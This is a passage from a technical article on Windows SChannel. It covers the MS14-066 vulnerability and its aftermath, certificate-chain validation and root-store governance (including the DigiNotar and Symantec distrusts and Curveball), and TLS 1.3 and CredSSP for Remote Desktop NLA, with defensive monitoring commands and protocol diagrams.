&lt;p&gt;The technical character of the bug was a pre-authentication remote code execution in SChannel&apos;s TLS message-parsing path. The NVD record summarises it as &quot;Schannel in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via crafted packets&quot; [@nvd-cve-2014-6321]. US-CERT issued Alert TA14-318A confirming the severity and noting the wide platform coverage [@uscert-ta14-318a]; CERT/CC published vulnerability note VU#505120 with the same substance [@certcc-vu505120]. &lt;strong&gt;The bulletin was disclosed under coordinated vulnerability disclosure on the standard Patch Tuesday cadence; IBM X-Force researcher Robert Freeman is publicly credited as the discoverer.&lt;/strong&gt; The &quot;privately reported&quot; phrasing in MS14-066 [@ms14-066] is Microsoft&apos;s standard nomenclature for coordinated-disclosure intake, not a claim that the discovery was internal to Microsoft.&lt;/p&gt;
&lt;h3&gt;What MS14-066 was not&lt;/h3&gt;
&lt;p&gt;It was not Heartbleed. &lt;strong&gt;Heartbleed (CVE-2014-0160), disclosed April 7, 2014, was a flaw in OpenSSL&apos;s TLS Heartbeat extension code path&lt;/strong&gt; [@nvd-cve-2014-0160]. The bug let an attacker over-read OpenSSL process memory by sending a Heartbeat request whose declared payload length exceeded the actual payload. SChannel does not implement the OpenSSL Heartbeat extension; that code simply did not exist in &lt;code&gt;schannel.dll&lt;/code&gt;. Microsoft&apos;s MSRC publicly noted in April 2014 that Microsoft Services were not affected by the Heartbleed vulnerability -- the substance held because the affected codebase was OpenSSL&apos;s, not Microsoft&apos;s [@nvd-cve-2014-0160].The original April 2014 MSRC blog post stating SChannel was unaffected by Heartbleed has migrated and renders only its page chrome today. The substance is independently anchored by the NVD record for CVE-2014-0160, which explicitly scopes the vulnerability to OpenSSL 1.0.1 through 1.0.1f.&lt;/p&gt;
&lt;p&gt;It was not &quot;silently patched,&quot; at least not at the headline level. CVE-2014-6321 had a public Patch Tuesday bulletin, contemporary Krebs and NVD coverage, US-CERT and CERT/CC alerts, and proof-of-concept walkthroughs from BeyondTrust and Security Sift within months [@certcc-vu505120][@uscert-ta14-318a]. The &quot;silently patched&quot; framing in the press is the residue of a &lt;em&gt;real but narrower&lt;/em&gt; fact: the same KB shipped additional Schannel hardening fixes that were not separately bulletined.The &quot;silently patched&quot; framing of MS14-066 is itself the residue of a real fact -- the November 11, 2014 KB included Schannel hardening fixes that were not separately bulletined. The headline CVE itself was very much public, and the discovery is publicly credited to IBM X-Force researcher Robert Freeman under coordinated vulnerability disclosure. This article does not assign specific CVE IDs to the &lt;em&gt;bundled&lt;/em&gt; hardening extras, in line with the project&apos;s premise-audit discipline.&lt;/p&gt;
&lt;h3&gt;What it occasioned&lt;/h3&gt;
&lt;p&gt;Three lasting effects of MS14-066 are worth naming.&lt;/p&gt;
&lt;p&gt;First, &lt;strong&gt;the cipher-suite expansion in the same KB&lt;/strong&gt;. The patch bundled new TLS 1.2 cipher suites (the ECDHE-RSA suites that Windows 7 and Server 2008 R2 had partially supported, broadened across the entire then-supported family). Some operators were caught off guard by the new lineup; the registry-toggle pattern from Section 3 was what got them out of the bind.&lt;/p&gt;
&lt;p&gt;Second, &lt;strong&gt;a measurable uptick in external SChannel fuzzing&lt;/strong&gt;. After 2014, the public TLS-stack-testing community treated SChannel as a first-class target, not as a closed-source black box no one could meaningfully probe. The most visible artifact is Hubert Kario&apos;s TLS-Fuzzer at Red Hat -- a test suite that, in the project&apos;s own framing, &quot;doesn&apos;t check only that the system under test didn&apos;t crash, it checks that it returned correct error messages&quot; [@tlsfuzzer-github]. Section 11 returns to TLS-Fuzzer as the closest public substitute for a behavioural specification of SChannel.&lt;/p&gt;
&lt;p&gt;Third, the lesson the substrate could not absorb: &lt;strong&gt;algorithm-agility does not extend to the parsing path&lt;/strong&gt;. The wire-format state machine has to be correct because no provider model can fix a bug in &lt;code&gt;schannel.dll&lt;/code&gt; itself. CNG could rotate primitives without rewriting SChannel; CNG could not rotate SChannel&apos;s TLS message parser. That asymmetry is structural and remains true today.&lt;/p&gt;
&lt;h3&gt;What it was not, part two: not the trigger for SymCrypt&lt;/h3&gt;
&lt;p&gt;Some narratives connect MS14-066 to a &quot;SChannel rewrite&quot; or a &quot;FIPS rewrite&quot; project that followed. The dates do not support either framing. SymCrypt was started by Niels Ferguson in &lt;strong&gt;late 2006&lt;/strong&gt;, with the first sources committed in February 2007 [@symcrypt-github] -- seven years before Heartbleed and eight years before MS14-066. SymCrypt became the primary library for symmetric algorithms with Windows 8 (October 2012, before MS14-066) and the primary library for all algorithms across Windows starting with the Windows 10 1703 release in March 2017. Open-sourcing followed under the MIT license in July 2019 [@symcrypt-github]. The honest story is that SymCrypt was the maturation of CNG&apos;s primitive layer over a decade; it had no causal relationship to either 2014 disclosure.&lt;/p&gt;

This article refuses to assert any causal link between Heartbleed and SymCrypt because the timeline does not support it. SymCrypt began in late 2006; Heartbleed was disclosed in April 2014. SymCrypt&apos;s role as the Windows-wide primary crypto library lands with Windows 10 1703 in March 2017 [@symcrypt-github]. Conflations of this kind are how the security-pop-press version of history overwrites the engineering version. The agility argument is stronger, not weaker, when the actual causal chains are preserved.
&lt;p&gt;MS14-066 taught Microsoft that the substrate&apos;s algorithm-agility property does not extend to the parsing path -- the wire-format state machine has to be correct because no provider model can fix a bug in &lt;code&gt;schannel.dll&lt;/code&gt; itself. The next section turns to the &lt;em&gt;other&lt;/em&gt; load-bearing path: not the bytes on the wire, but the certificate the server presents to authenticate.&lt;/p&gt;
&lt;h2&gt;7. The Certificate-Validation Pipeline: &lt;code&gt;CertGetCertificateChain&lt;/code&gt;, OCSP, and the Microsoft Trusted Root Program&lt;/h2&gt;
&lt;p&gt;The other half of any TLS handshake is &lt;strong&gt;trust&lt;/strong&gt;. Bytes can be encrypted with the strongest AEAD in the SymCrypt CHANGELOG and the handshake can use a quantum-resistant key exchange -- and the whole exchange still means nothing if the certificate the server presents traces back to an attacker-controlled CA. On Windows, that whole question routes through one API: &lt;code&gt;CertGetCertificateChain&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;The chain engine&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;CertGetCertificateChain&lt;/code&gt; walks from leaf to trusted root using Authority Key Identifier / Subject matching, fetches any missing intermediates via the certificate&apos;s Authority Information Access (AIA) &lt;code&gt;caIssuers&lt;/code&gt; URL, and resolves against the local Microsoft Trusted Root Store. The store itself is kept current through the &lt;code&gt;crypt32.dll&lt;/code&gt; auto-update mechanism, which downloads a signed &lt;code&gt;authrootstl.cab&lt;/code&gt; periodically and updates the trust list in place.&lt;/p&gt;
&lt;p&gt;Per-certificate checks follow the X.509 PKI profile (RFC 5280, May 2008) [@rfc-5280]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Signature verification&lt;/strong&gt; -- each cert is signed by the next-up cert&apos;s private key.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Validity&lt;/strong&gt; -- &lt;code&gt;notBefore&lt;/code&gt; / &lt;code&gt;notAfter&lt;/code&gt; within the current time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Key Usage and Extended Key Usage&lt;/strong&gt; -- the leaf must include &lt;code&gt;id-kp-serverAuth&lt;/code&gt; (&lt;code&gt;1.3.6.1.5.5.7.3.1&lt;/code&gt;) for a TLS server presentation, and the chain&apos;s intermediates must permit &lt;code&gt;serverAuth&lt;/code&gt; in their EKU constraints if they declare any.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Basic Constraints&lt;/strong&gt; -- non-leaf certs must have &lt;code&gt;cA=TRUE&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Name Constraints&lt;/strong&gt; -- per RFC 5280 §4.2.1.10, intermediates may declare &lt;code&gt;permittedSubtrees&lt;/code&gt; and &lt;code&gt;excludedSubtrees&lt;/code&gt; over DNS names, IP ranges, and other name forms; the chain engine enforces these against the leaf&apos;s SAN.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Revocation&lt;/strong&gt; -- per-cert, against the chosen revocation source.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;CertVerifyCertificateChainPolicy&lt;/code&gt; then layers protocol-specific overlays on top of that purely structural validation. The most important for TLS is &lt;code&gt;CERT_CHAIN_POLICY_SSL&lt;/code&gt;, which adds the SNI / SAN hostname match and TLS-specific server-auth constraints.&lt;/p&gt;

flowchart TD
    A[&quot;Leaf certificate from TLS handshake&quot;] --&amp;gt; B[&quot;Chain engine -- CertGetCertificateChain&quot;]
    B --&amp;gt; C{&quot;Path build via AKI / SKI matching, AIA caIssuers fetch&quot;}
    C --&amp;gt; D[&quot;Per-cert structural checks (RFC 5280)&quot;]
    D --&amp;gt; E{&quot;Revocation source&quot;}
    E --&amp;gt; F[CRL distribution point]
    E --&amp;gt; G[OCSP responder]
    E --&amp;gt; H[OCSP stapled response]
    D --&amp;gt; I[&quot;CertVerifyCertificateChainPolicy&quot;]
    I --&amp;gt; J{&quot;CERT_CHAIN_POLICY_SSL -- SNI / SAN match, serverAuth EKU&quot;}
    J --&amp;gt; K[Chain valid for TLS server]
    F --&amp;gt; I
    G --&amp;gt; I
    H --&amp;gt; I
&lt;h3&gt;Revocation: CRL, OCSP, OCSP stapling&lt;/h3&gt;

The **Online Certificate Status Protocol** (RFC 6960) lets a client ask the issuing CA&apos;s OCSP responder whether a specific certificate is revoked, by serial number [@rfc-6960]. Plain OCSP is a separate request to the CA on every connection, which leaks visited hostnames to the CA and adds latency. **OCSP stapling** lets the server fetch a fresh signed OCSP response on a schedule and &quot;staple&quot; it into the TLS handshake via the `status_request` extension -- the client gets the same revocation proof without the side channel. SChannel consumes stapled OCSP responses through the `status_request` extension (RFC 6066 §8 for TLS 1.2, RFC 8446 §4.4.2.1 for TLS 1.3 [@rfc-8446]) and feeds the result into the chain engine.
&lt;p&gt;A practical SChannel deployment combines CRL fetching, OCSP, and OCSP stapling: stapling preferred when present, OCSP fallback when not, CRL as the long-tail safety net. IIS&apos;s stapling support is on by default in modern releases; turning it off is the wrong default for any internet-facing endpoint.&lt;/p&gt;
&lt;h3&gt;The Microsoft Trusted Root Program and the CCADB&lt;/h3&gt;
&lt;p&gt;SChannel&apos;s trust posture inherits the Microsoft Trusted Root Program&apos;s membership decisions. Microsoft does not run the trust program in isolation. It participates in the &lt;strong&gt;Common CA Database (CCADB)&lt;/strong&gt; alongside Mozilla, Google, and Apple, sharing root inclusion / removal / audit data across the major root stores [@ccadb-resources]. The CCADB Resources page lists the public extractions (Microsoft&apos;s TLS roots, Mozilla&apos;s TLS roots, code-signing roots, S/MIME roots) and the program-specific report URLs.&lt;/p&gt;
&lt;p&gt;The governance flow is documented end-to-end on the Microsoft Trusted Root Program program-requirements page [@ms-trusted-root-program-requirements]. Membership requires annual WebTrust or ETSI EN 319 411 audits, full CCADB disclosure of the PKI hierarchy, and adherence to the technical requirements (minimum key sizes, signature-algorithm policy, extension constraints, name-form profiles). Distrust decisions can be triggered by (a) CCADB-coordinated cross-vendor consensus where Microsoft acts alongside Mozilla, Apple, and Google; (b) unilateral Microsoft action when the program judges a CA below the bar; or (c) audit-failure findings that fail to remediate inside an agreed window.&lt;/p&gt;
&lt;p&gt;Propagation to Windows clients goes through two signed trust lists distributed via the Automatic Root Update mechanism: &lt;strong&gt;&lt;code&gt;authrootstl.cab&lt;/code&gt;&lt;/strong&gt; carries the currently-trusted roots together with per-EKU enablement bits, and &lt;strong&gt;&lt;code&gt;disallowedcertstl.cab&lt;/code&gt;&lt;/strong&gt; is the explicit untrust list. Both are fetched by &lt;code&gt;crypt32.dll&lt;/code&gt; from &lt;code&gt;http://ctldl.windowsupdate.com/...&lt;/code&gt; on a periodic schedule and consumed by the chain engine on its next chain build. The SChannel SSP itself does not maintain a separate trust list; it inherits whatever &lt;code&gt;CertGetCertificateChain&lt;/code&gt; resolves against the auto-updated stores.&lt;/p&gt;

flowchart TB
    A[CA submits audit, CCADB disclosure, technical compliance] --&amp;gt; B[Microsoft Trusted Root Program review]
    B --&amp;gt; C{&quot;Decision -- include, distrust, NotBefore-date schedule&quot;}
    C --&amp;gt; D[CCADB cross-vendor coordination -- Mozilla, Apple, Google]
    C --&amp;gt; E[authrootstl.cab updates]
    C --&amp;gt; F[disallowedcertstl.cab updates]
    E --&amp;gt; G[ctldl.windowsupdate.com distribution]
    F --&amp;gt; G
    G --&amp;gt; H[crypt32.dll Automatic Root Update on client]
    H --&amp;gt; I[CertGetCertificateChain consults updated stores]
    I --&amp;gt; J[SChannel SSP handshake trust decision]
&lt;h3&gt;Two worked examples: DigiNotar (2011) and Symantec (2018)&lt;/h3&gt;
&lt;p&gt;The MTRP governance flow looks abstract until two real distrust events make it concrete.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DigiNotar -- August / September 2011 -- panic-mode revocation.&lt;/strong&gt; Microsoft Security Advisory 2607712 (&quot;Fraudulent Digital Certificates Could Allow Spoofing&quot;) was published on August 29, 2011 and updated through September 19 to version 5.0 [@ms-advisory-2607712-diginotar]. The Dutch CA DigiNotar&apos;s signing infrastructure had been breached by an attacker who issued fraudulent certificates for &lt;code&gt;*.google.com&lt;/code&gt; and other high-value names. Microsoft, Mozilla, Apple, and Google removed DigiNotar&apos;s roots from their trust stores within days. The Microsoft-side propagation pushed the DigiNotar Root CA out of &lt;code&gt;authrootstl.cab&lt;/code&gt; and added the relevant entries to &lt;code&gt;disallowedcertstl.cab&lt;/code&gt;; clients on the Automatic Root Update pipeline picked up the change within the next refresh cycle. SChannel&apos;s chain engine then refused to validate any leaf signed under the DigiNotar hierarchy -- not because SChannel changed, but because the trust store it consults changed underneath it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Symantec deprecation -- October 2018 -- planned per-NotBefore-date schedule.&lt;/strong&gt; The Symantec distrust is the cleanest published example of how a CCADB-coordinated &lt;em&gt;planned&lt;/em&gt; deprecation differs from a &lt;em&gt;panic-mode&lt;/em&gt; revocation. Microsoft&apos;s October 4, 2018 Security Blog post documents the four-vendor (Microsoft, Mozilla, Apple, Google) coordinated schedule, keyed on the certificate&apos;s &lt;code&gt;NotBefore&lt;/code&gt; date rather than on the root itself: per the per-root table in the blog post, the relevant cut-overs were September 30, 2018; January 31, 2019; and January 1, 2020 [@ms-blog-symantec-distrust]. Certificates &lt;em&gt;issued before&lt;/em&gt; the per-root NotBefore date stayed trusted to their natural expiration; certificates &lt;em&gt;issued after&lt;/em&gt; were rejected. The mechanism on the SChannel side is unchanged from DigiNotar -- the chain engine reads the updated trust posture from &lt;code&gt;authrootstl.cab&lt;/code&gt; / &lt;code&gt;disallowedcertstl.cab&lt;/code&gt; and applies it on the next chain build -- but the &lt;em&gt;operational character&lt;/em&gt; is completely different: a years-long planned phase-out instead of a week-long emergency cleanup.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A panic-mode distrust (DigiNotar) removes a root outright and propagates over days. A planned distrust (Symantec) uses NotBefore dates to grandfather pre-existing certificates while rejecting new ones, propagates over months to years, and gives the broader industry time to migrate. Both flow through the same &lt;code&gt;authrootstl.cab&lt;/code&gt; / &lt;code&gt;disallowedcertstl.cab&lt;/code&gt; plumbing. The governance subtlety lives in &lt;em&gt;which kind&lt;/em&gt; of distrust the program issues for a given CA&apos;s circumstances.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Enterprise observability: CAPI2/Operational event IDs&lt;/h3&gt;
&lt;p&gt;The governance flow ends at the operator&apos;s host -- but only if the operator can see it land. The Microsoft Learn troubleshooting article on the May 24, 2022 removal of the U.S. Federal Common Policy CA &quot;G1&quot; root carries the canonical observability recipe [@ms-learn-fcpca-removal]. On any Windows host you can enable the per-event tracing channel with &lt;code&gt;wevtutil sl Microsoft-Windows-CAPI2/Operational /e:true&lt;/code&gt; and then watch the Event Viewer under &lt;code&gt;Applications and Services Logs &amp;gt; Microsoft &amp;gt; Windows &amp;gt; CAPI2 &amp;gt; Operational&lt;/code&gt; for the chain-engine events that the FCPCA-removal article enumerates verbatim [@ms-learn-fcpca-removal]: &lt;strong&gt;Event ID 90&lt;/strong&gt; logs every certificate consulted during chain building, &lt;strong&gt;Event ID 11&lt;/strong&gt; records chain-build failures, &lt;strong&gt;Event ID 30&lt;/strong&gt; records SSL or NTAuth policy-layer failures, &lt;strong&gt;Events 40-43&lt;/strong&gt; show stored CRLs and AIA paths, and &lt;strong&gt;Events 50-53&lt;/strong&gt; show network CRL accesses. The same article documents the empirical post-distrust propagation window in plain language: &quot;Applications and operations that depend on the &apos;G1&apos; root certificate will fail one to seven days after they receive the root certificate update.&quot; That one-to-seven-day window is the realistic latency budget between an MTRP distrust event landing in &lt;code&gt;authrootstl.cab&lt;/code&gt; and a given Windows host actually applying it -- a fingerprint operators can validate per host, not just per the rollout calendar.&lt;/p&gt;
&lt;p&gt;The PowerShell complement is brief and worth keeping in the muscle memory: &lt;code&gt;Get-ChildItem Cert:\LocalMachine\AuthRoot&lt;/code&gt; enumerates the currently-trusted roots; &lt;code&gt;Get-ChildItem Cert:\LocalMachine\Disallowed&lt;/code&gt; enumerates the disallowed store; both reflect whatever the last &lt;code&gt;crypt32.dll&lt;/code&gt; Automatic Root Update cycle left in place.&lt;/p&gt;
&lt;h3&gt;A cautionary tale: CVE-2020-0601, &quot;Curveball&quot;&lt;/h3&gt;
&lt;p&gt;In January 2020 the NSA disclosed a chain-engine spoofing vulnerability in &lt;code&gt;crypt32.dll&lt;/code&gt;&apos;s ECC certificate validation [@nvd-cve-2020-0601][@nsa-curveball-alternative]. The bug let an attacker craft a fraudulent ECC certificate that the Windows chain engine would treat as having been signed by a trusted root, by failing to fully verify the curve parameters against the cached trusted root&apos;s curve. Curveball is strictly a &lt;code&gt;crypt32.dll&lt;/code&gt; bug, not a SChannel SSP bug -- but it shaped the SChannel posture in two ways. First, it demonstrated that the chain engine and the SSP are &lt;em&gt;equally&lt;/em&gt; load-bearing for &quot;is this TLS connection trustworthy?&quot; Second, it was the most prominent example of the NSA disclosing a Windows vulnerability via the regular MSRC channel rather than hoarding it. Microsoft&apos;s January 2020 Patch Tuesday cycle addressed CVE-2020-0601 ahead of any public proof-of-concept.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The agility property the rest of this article celebrates is a property of CNG and SChannel. The trust pipeline -- &lt;code&gt;CertGetCertificateChain&lt;/code&gt;, &lt;code&gt;CertVerifyCertificateChainPolicy&lt;/code&gt;, the trust-store update mechanism in &lt;code&gt;crypt32.dll&lt;/code&gt; -- is a parallel concern. A perfectly executed TLS 1.3 handshake against a trusted-looking certificate that is actually fraudulent is still a compromise. Curveball is the canonical reminder that audit posture for SChannel-served endpoints has to cover both halves.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Certificate validation is the other axis on which SChannel has had to evolve. With the substrate (Sections 4 through 6) and the trust pipeline (this section) both stabilised, the article now turns to what &quot;modern SChannel&quot; actually looks like in the field -- TLS 1.3 on by default, TPM-backed server keys available for compliance scenarios, and the LSA-protection moat that makes session-key extraction harder than it used to be.&lt;/p&gt;
&lt;h2&gt;8. Modern SChannel: TLS 1.3, CredSSP for RDP, TPM-Backed Keys, and the LSASS Moat&lt;/h2&gt;
&lt;p&gt;By mid-2026 a default Windows 11 or Server 2022 / 2025 box is doing things its 2019 equivalent could not. TLS 1.3 is on. CredSSP wraps the RDP credential-delegation path inside a SChannel-protected TLS tunnel [@ms-cssp-landing]. The TPM is available as a key custodian. LSASS is a Protected Process; on most newer Windows 11 builds, Credential Guard is on by default. These are not four independent stories; they are four layers of the same defence-in-depth posture for the modern SChannel-served TLS endpoint.&lt;/p&gt;
&lt;h3&gt;TLS 1.3 in SChannel&lt;/h3&gt;
&lt;p&gt;RFC 8446 (Eric Rescorla, Mozilla, August 2018) [@rfc-8446] is the protocol generation that SChannel finally ships default-on in Windows Server 2022 (GA August 2021) and Windows 11 (GA October 5, 2021). Windows 10 and Windows Server 2019 SChannel remain TLS 1.2 only -- a fact worth naming because it is the most common cause of confusion in mixed-version Windows fleets [@ms-learn-tls-cipher-suites-server-2022].&lt;/p&gt;
&lt;p&gt;What changed at the wire-format level matters less for SChannel than how cleanly the changes mapped through CNG. TLS 1.3 shrank the cipher-suite menu to three AEAD suites: &lt;code&gt;TLS_AES_128_GCM_SHA256&lt;/code&gt;, &lt;code&gt;TLS_AES_256_GCM_SHA384&lt;/code&gt;, and &lt;code&gt;TLS_CHACHA20_POLY1305_SHA256&lt;/code&gt; [@rfc-8446]. The key-share namespace separated from the cipher-suite namespace -- &lt;code&gt;supported_groups&lt;/code&gt; (X25519, secp256r1, secp384r1, and now &lt;code&gt;X25519MLKEM768&lt;/code&gt;) is an independent extension from &lt;code&gt;cipher_suites&lt;/code&gt;. The handshake collapsed to one round trip.The 0-RTT (early data) feature of TLS 1.3 trades a round trip for replay-resistance complexity. SChannel&apos;s posture on 0-RTT is conservative: clients can request it, servers default to off unless explicitly opted in, and the documentation flags the replay-protection trade-offs.&lt;/p&gt;
&lt;p&gt;The downgrade-resistance sentinel in &lt;code&gt;ServerHello.random&lt;/code&gt; (RFC 8446 §4.1.3) is worth a beat. A TLS 1.3 server that, for whatever reason, is negotiated down to TLS 1.2 or below by middlebox interference fills the last eight bytes of its &lt;code&gt;ServerHello.random&lt;/code&gt; with one of two well-known sentinels (&lt;code&gt;44 4F 57 4E 47 52 44 01&lt;/code&gt; for &quot;downgraded from 1.3 to 1.2&quot;; &lt;code&gt;44 4F 57 4E 47 52 44 00&lt;/code&gt; for &quot;downgraded from 1.3 to 1.1 or earlier&quot;). A genuinely TLS 1.3-capable client checks for the sentinel after the handshake and aborts on mismatch. This puts the active-downgrade-attack envelope inside TLS 1.3 at a much narrower place than it was in TLS 1.2.&lt;/p&gt;

sequenceDiagram
    participant App as Application
    participant SC as SChannel SSP
    participant CNG as BCrypt / NCrypt
    participant Peer as Remote endpoint&lt;pre&gt;&lt;code&gt;App-&amp;gt;&amp;gt;SC: AcquireCredentialsHandle (server cert, key handle)
App-&amp;gt;&amp;gt;SC: InitializeSecurityContext (first call)
SC-&amp;gt;&amp;gt;CNG: BCrypt ECDH or MLKEM key share
SC-&amp;gt;&amp;gt;Peer: ClientHello (cipher_suites, supported_groups, key_share)
Peer--&amp;gt;&amp;gt;SC: ServerHello, EncryptedExtensions, Certificate, CertVerify, Finished
SC-&amp;gt;&amp;gt;CNG: NCryptSignHash or NCrypt key derive
SC-&amp;gt;&amp;gt;App: SECBUFFER tokens, then SEC_E_OK
App-&amp;gt;&amp;gt;SC: EncryptMessage and DecryptMessage on every record
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;CredSSP and the Remote Desktop NLA path&lt;/h3&gt;

The SSPI provider in `credssp.dll` that securely delegates Windows credentials from a client to a target server inside a TLS-protected tunnel. CredSSP is the SSP that backs Remote Desktop Network Level Authentication (RDP NLA): it wraps a SChannel TLS handshake, tunnels an SPNEGO / Kerberos / NTLM authentication inside that tunnel, performs a channel-binding hash exchange, and finally transmits the user&apos;s credential material to the destination encrypted under the SSPI session key [@ms-cssp-landing][@ms-cssp-glossary].
&lt;p&gt;The Microsoft Open Specifications page for the &lt;strong&gt;Credential Security Support Provider Protocol&lt;/strong&gt; ([MS-CSSP], version 21.0, April 2024) [@ms-cssp-landing] defines the protocol that backs Remote Desktop NLA. CredSSP is not a TLS protocol of its own; it is an SSP that &lt;em&gt;uses&lt;/em&gt; SChannel as its transport. The relationship is structural -- CredSSP is one of the most consequential &lt;em&gt;consumers&lt;/em&gt; of SChannel inside Windows, and almost every RDP session opened against a modern Windows host runs the CredSSP-over-SChannel sequence before the RDP video stream even starts.&lt;/p&gt;
&lt;p&gt;The five-step CredSSP-over-TLS sequence per the open-spec &quot;Processing Events and Sequencing Rules&quot; page [@ms-cssp-sequencing]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;TLS handshake&lt;/strong&gt;. The CredSSP client and CredSSP server complete the SChannel TLS handshake; only the server presents a certificate, so the TLS-layer client is anonymous. After this step, all subsequent CredSSP messages are encrypted by the TLS channel. The MS-CSSP spec is explicit that &quot;the CredSSP Protocol does not extend the TLS wire protocol&quot; and that &quot;TLS session resumption is not supported&quot; [@ms-cssp-sequencing].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SPNEGO / Kerberos / NTLM tunnelled inside TLS&lt;/strong&gt;. Authentication tokens are carried in the &lt;code&gt;negoTokens&lt;/code&gt; field of the protocol&apos;s &lt;code&gt;TSRequest&lt;/code&gt; ASN.1 structure. The negotiation is performed by the SSPI Negotiate provider, which usually selects Kerberos when the client is domain-joined and falls back to NTLM otherwise.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Public-key (channel-binding) hash exchange&lt;/strong&gt;. This is the post-CVE-2018-0886 mechanism. The client computes a SHA-256 hash over a fixed magic string concatenated with a nonce and the server&apos;s &lt;code&gt;SubjectPublicKey&lt;/code&gt;, encrypts that hash under the SSPI session key established in step 2, and sends it in the &lt;code&gt;pubKeyAuth&lt;/code&gt; field of &lt;code&gt;TSRequest&lt;/code&gt;. The earlier (v2 / v3 / v4) &quot;encrypt the public key + 1&quot; scheme that was broken by CVE-2018-0886 has been replaced by this channel-binding hash for protocol versions 5 and 6 of CredSSP.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Server-side hash response with the server magic&lt;/strong&gt;. The server computes its own version of the hash (using a different fixed magic string for the server-to-client direction), encrypts it under the session key, and returns it in its own &lt;code&gt;pubKeyAuth&lt;/code&gt;. Both sides have now proven they hold the same session key bound to the same server public key, which closes a class of man-in-the-middle attacks against the inner authentication.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Encrypted credential transfer in &lt;code&gt;authInfo&lt;/code&gt;&lt;/strong&gt;. The credentials themselves -- a &lt;code&gt;TSPasswordCreds&lt;/code&gt;, &lt;code&gt;TSSmartCardCreds&lt;/code&gt;, or &lt;code&gt;TSRemoteGuardCreds&lt;/code&gt; structure depending on the chosen logon style -- are encrypted under the SSPI session key and transmitted in the &lt;code&gt;authInfo&lt;/code&gt; field. The destination decrypts them inside &lt;code&gt;lsass.exe&lt;/code&gt; (a PPL-protected process when RunAsPPL is enabled, see below), and the operating system then uses them to log the user on.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant Client as RDP client
    participant Server as RDP server
    Note over Client,Server: Step 1 -- SChannel TLS handshake, server cert only, client anonymous at TLS layer
    Client-&amp;gt;&amp;gt;Server: ClientHello
    Server--&amp;gt;&amp;gt;Client: ServerHello, Certificate, ServerHelloDone (TLS 1.2) or one-RTT TLS 1.3 equivalent
    Client-&amp;gt;&amp;gt;Server: Finished -- TLS tunnel up
    Note over Client,Server: Step 2 -- SPNEGO Kerberos or NTLM tokens inside TSRequest.negoTokens, all inside TLS
    Client-&amp;gt;&amp;gt;Server: TSRequest with negoTokens (Kerberos AP-REQ or NTLM Type 1)
    Server--&amp;gt;&amp;gt;Client: TSRequest with negoTokens (Kerberos AP-REP or NTLM Type 2 then 3)
    Note over Client,Server: Step 3 -- channel-binding hash, client side (replaces broken pre-CVE-2018-0886 scheme)
    Client-&amp;gt;&amp;gt;Server: TSRequest.pubKeyAuth -- E(sessionKey, SHA256(client-magic, nonce, server SubjectPublicKey))
    Note over Client,Server: Step 4 -- server-side hash response with server-magic
    Server--&amp;gt;&amp;gt;Client: TSRequest.pubKeyAuth -- E(sessionKey, SHA256(server-magic, nonce, server SubjectPublicKey))
    Note over Client,Server: Step 5 -- encrypted credentials in TSRequest.authInfo
    Client-&amp;gt;&amp;gt;Server: TSRequest.authInfo -- E(sessionKey, TSPasswordCreds or TSSmartCardCreds or TSRemoteGuardCreds)
    Note over Server: lsass.exe decrypts, logs the user on
&lt;p&gt;The NLA threat-model framing per the archived Server 2008 R2 TechNet content is worth quoting because it captures what NLA actually buys [@ms-archive-nla]. NLA forces user authentication &lt;em&gt;before&lt;/em&gt; RDP session resources are allocated: &quot;It requires fewer remote computer resources initially. The remote computer uses a limited number of resources before authenticating the user, rather than starting a full remote desktop connection as in previous versions. It can help provide better security by reducing the risk of denial-of-service attacks.&quot; The two concrete payoffs are pre-auth DoS resistance and pre-auth RDP-codepath RCE mitigation. &lt;strong&gt;BlueKeep (CVE-2019-0708)&lt;/strong&gt; and &lt;strong&gt;DejaBlue (CVE-2019-1181 / 1182)&lt;/strong&gt; would each have been substantially harder to exploit on NLA-enabled hosts because the vulnerable RDP code paths sit &lt;em&gt;behind&lt;/em&gt; the NLA gate. NLA has been on by default for RDP Session Hosts since Windows Server 2012 R2.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A naive TLS-only deployment authenticates the &lt;em&gt;server&lt;/em&gt; to the &lt;em&gt;client&lt;/em&gt; via the server certificate, and authenticates the &lt;em&gt;user&lt;/em&gt; in plaintext above TLS. CredSSP adds a second layer: the user&apos;s authentication runs inside the TLS tunnel via SPNEGO / Kerberos / NTLM, and the user&apos;s credentials -- if delegated at all -- are encrypted under a session key that is channel-bound to the server&apos;s public key. With Remote Credential Guard (&lt;code&gt;TSRemoteGuardCreds&lt;/code&gt;), the destination&apos;s plaintext-credential exposure can be reduced to zero -- the destination receives only a service ticket usable for the session, not a reusable password hash.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;TPM-backed server keys via the Microsoft Platform Crypto Provider&lt;/h3&gt;
